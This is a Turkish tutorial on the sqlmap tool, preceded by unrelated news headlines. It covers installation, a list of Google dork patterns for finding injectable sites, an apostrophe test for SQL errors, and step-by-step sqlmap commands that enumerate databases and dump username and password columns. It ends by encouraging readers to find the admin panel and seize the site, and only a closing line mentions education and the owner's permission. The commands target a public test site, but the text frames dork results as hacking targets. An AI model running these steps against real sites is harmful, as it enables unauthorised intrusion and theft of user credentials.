5:41 pm - Emekli ikramiyesinde Yeni Gelişme
4:37 pm - Seçim Anketinin Ortalaması
2:17 am - Ekrem Açıkel’in yeni kanalı belli oldu
2:10 am - Muharrem İnce Kararını Verdi
2:03 am - Malzemelerini Satmak İçin Taşıttığı
1:50 am - Milletimi Çok Özledim
1:44 am - Çobanın Okkalı Cevabı
6:12 pm - İlk Kez Böyle Birşey Oluyor
4:56 pm - Kazananı Açıkladı
2:06 pm - TAPUSU OLAN HERKESİ İLGİLENDİRİYOR
SQLmap, sızma testinde SQL açıklarını tespit etmek ve kullanmak için kullanılan açık kaynak kodlu bir araçtır. SQLmap, SQL açıklarını algılama ve sızma sürecini otomatikleştirir. SQL Enjeksiyon saldırıları, SQL kullanan veritabanlarının kontrolünü ele geçirebilir. MySQL, SQL Server, Oracle ve diğerleri gibi kendisine bağlı bir SQL veritabanına sahip olabilecek herhangi bir web sitesini veya web uygulamasını ele geçirebilir. Bu veritabanları genellikle müşteri bilgileri, kişisel veriler, ticari rakamlar, finansal veriler vb. gibi hassas verileri içerebilir. SQL güvenlik açıklarını bulabilmek ve bunlara karşı savunma yapabilmek hayati önem taşımaktadır. SQLmap bu güvenlik açıklarını bulmanıza ve açıkları istismar etmenize yardımcı olur.
Linux ve Windows için Sqlmap kurulumu ve kullanımı anlatılmıştır. Aşşağıya inerek okumaya devam edebilirsiniz.
Öncelikle Terminali açıyoruz ve aşşağıdaki komutu giriyoruz.
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap
Bu komutu girdikten sonra gerekli dosyalar Linux sisteminize kurulucaktır ve artık Sqlmap kullanımına hazırsınız.
Windows Sqlmap kurulumu için öncelikle Python indirmemiz gerekiyor. Aşşağıdaki linklerden Python indirdikten sonra diğer adımlara geçersiniz.
Komut istemcinizi CMD’yi yönetici olarak açın.
Sqlmap’ı başlatmak için sırasıyla aşşağıdaki komutları CMD’ye girin.
cd Desktop
cd sqlmap
sqlmap.py
Artık Sqlmap kurulumu bitti.
Sql açıkları bazen şans eseri karşınıza çıkabilir ama çoğu zaman SQL açığa uygun dorklarla bulunması mümkündür. Dorkların çeşitleri vardır örneğin wordpress dorkları joomla dorkları sql dorkları vb. bu listeyi daha uzatabilirsiniz. Dorkdaki amaç sizin SQL açığınıza uygun arama sonuçlarına ulaştırması. Aşşağıda dork örnekleri verilmiştir sizde istediğiniz herhangi birini seçip Google’da deneyebilirsiniz. Şimdilik aşşağıda olan dorklarla yetinebilirsiniz, eğer az gelirse google SQL dork yazarak binlercesini bulabilirsiniz.
Örnek Google SQL Dorklar
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
room-detail.php?id=
Bu dorkların sonuçlarında hedef bir site mutlaka çıkıcaktır sabırlı olun. Karşınıza çıkan sitenin SQL açıklı olduğunu şöyle anlayabilirsiniz.
http://testphp.vulnweb.com/listproducts.php?cat=1
Bu URL normal bir URL olarak gözukuyor ama 1 sayısının yanına ‘(kesme işareti) eklediğinizde eğer hata veriyorsa o site SQL açığı mevcuttur.Örnek bir fotoğraf aşşağıda verilmiştir.
http://testphp.vulnweb.com/listproducts.php?cat=1‘
Kesme işaretli hali ile SQL hatası verince aşşağıdakine benzer hata çıktısı alabilirsiniz.
Gördüğünüz gibi hata verdi demek ki bu sitede bir SQL açığı mevcut. Unutmayın her bulduğunuz SQL açığı ile site hackleyemezsiniz. Çünkü bazen veritabanı şifreleri SHA-256, MD5 vb. şifreleme ile karşınıza çıkabilir ve kırılması zordur.
Öncelikle SQL açıklı sitemizin SQL açık gösterilmeden önceki halini kopyalayım.
Örnek: http://testphp.vulnweb.com/listproducts.php?cat=1
Sqlmap açıktıktan sonra ilk testimizi yapalım. Aşşağıdaki komutu yazalım.
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” --dbs
Bu komutu yazdıktan sonra tamamlanmasını bekliyoruz. Tamamlandıktan sonra karşınıza veritabanları çıkıcaktır.
O veritabanlarından sitenin şifresinin, kullanıcılarının olduğunu düşündüğünüz veritabanın adını kopyalayın ve kırmızı olarak belirtiğim yere ekleyin ve ardından aşşağıdaki komutları yazın.
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” -D veritabaniadi --tables
Bu işlemde tamamlandıktan sonra karşınıza veritabanı tablolar çıkıcaktır kullanıcılar,musteriler vb. tabloların birini seçin ve adını kopyalayın. Kopyaladıktan sonra yeni adımda o tabloyu kırmızı belirttiğim yere yapıştırabilirsiniz.
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” -D veritabaniadi -T veritabanıtablosu --columns
Ardından tamamlandıktan sonra karşınıza kolonlar çıkıcaktır. Users, passwords, kullanici, şifre vb. şeyler olabilir farketmez siz hangisine ulaşmak istiyorsanız onu aşşağıdaki komutta kırmızı belirttiğim yere virgül ile çoklu olarak bulabilirsiniz. Aşşağıdaki komutu uygulayalım ve sonuçları görelim.
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” -D veritabaniadi -T veritabanıtablosu -C kullanici,parola --dump
Artık sızdığınız sitenin kullanıcı adı, şifre, email vb.bilgileri elinize geçmiştir. Bazılarınıza direk normal olarak şifreler elinize geçebilir bazılarınıza ise SHA-256, MD5 gibi şifrelenerek geçmiş olabilir ama çok zor bunların kırılması, zaman isteyen bir süreç diyelim. Artık sitede istediğinizi yapabilirsiniz admin panel bularak elinizdeki bilgiler ile siteyi ele geçirebilirsiniz. Bu içerik kesinlikle kötü şekilde kullanılmamalı, eğitim için yazılmıştır. Bilinçli olmakta fayda var. Pentest yapılması site sahibinin izniyle gerçekleşmelidir, aksi takdirde yasaklı ve suç teşkil ediyor. Sağlıcakla kalın bir sonraki yazımızda görüşmek üzere.